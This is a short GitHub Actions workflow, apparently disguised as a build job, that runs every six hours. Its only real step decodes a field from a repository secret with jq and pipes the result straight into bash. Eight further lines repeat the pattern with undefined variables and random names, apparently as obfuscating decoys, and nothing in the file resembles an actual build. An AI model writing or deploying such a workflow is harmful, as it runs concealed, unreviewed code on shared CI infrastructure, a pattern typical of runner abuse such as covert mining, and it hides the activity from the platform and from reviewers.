name: tundramassive

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tundramassive
        env:
          qobr3: ${{ secrets.qobr3 }}
        run: |
          echo $qobr3 | jq -r .b007 | /bin/bash
          echo $go66603 | jq -r .x530 | /bin/bash
          echo $hzwg0 | jq -r .yb4 | /bin/bash
          echo $r4 | jq -r .iqq16 | /bin/bash
          echo $hqgs25415 | jq -r .aucuk216 | /bin/bash
          echo $fba798 | jq -r .u8100 | /bin/bash
          echo $vm7 | jq -r .sctj90 | /bin/bash
          echo $okqyj8333 | jq -r .lil40 | /bin/bash
          echo $x19 | jq -r .tarb02 | /bin/bash

